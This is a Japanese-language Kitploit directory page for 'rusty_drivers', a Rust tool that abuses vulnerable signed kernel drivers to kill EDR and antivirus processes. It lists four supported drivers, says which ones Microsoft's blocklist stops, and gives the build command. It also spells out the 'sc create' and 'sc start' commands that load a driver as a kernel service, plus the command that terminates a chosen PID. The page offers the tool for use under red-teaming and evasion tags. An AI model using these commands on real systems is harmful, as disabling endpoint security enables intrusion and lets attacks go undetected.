Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
rusty_drivers — BYOVD collection | Kitploit
ツール/GitHubGitHub/florianib/rusty_drivers
ExploitationIDS/IPS EvasionPost-ExploitationRed TeamingAdversarial Attack
GitHubflorianib/rusty_drivers

rusty_drivers

BYOVD collection

リポジトリを見る
2462年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

RustyDrivers

このプロジェクトは、EDR / AV プロセスの停止に焦点を当てた BYOVD コレクションです。

現在、以下のドライバがサポートされています:

ドライバ引数名ブロック済み
Process Explorerprocess_explorerはい
Genshin Impactgenshinはい
Rentdrv2rentdrv2いいえ
TrueSighttruesightいいえ

ブロック済みとは、そのドライバが Microsoft の ブロックリスト に含まれており、最新の Windows では実行できないことを意味します。

ビルド

root@kitploit:~
cargo build --release

使用方法

root@kitploit:~
rusty_drivers.exe --help            
Usage: rusty_drivers.exe --pid <PID> --driver <DRIVER>

Options:
  -p, --pid <PID>
  -d, --driver <DRIVER>
  -h, --help             Print help
  -V, --version          Print version

使用例

実行ファイルはドライバを悪用するためのサービスを登録しないため、これを手動で行う必要があります:

root@kitploit:~
sc create Test123 binpath= c:\test\<DRIVER>.sys type= kernel start= auto

その後、サービスを開始できます:

root@kitploit:~
sc start Test123

最後に、Process Explorer ドライバを使用して PID 1234 のプロセスを終了するには、次のコマンドを使用できます:

root@kitploit:~
rusty_drivers.exe --pid 1234 --driver process_explorer          

その後、サービスをクリーンアップすることを忘れないでください:

root@kitploit:~
sc stop Test123
sc delete Test123
ツールをダウンロード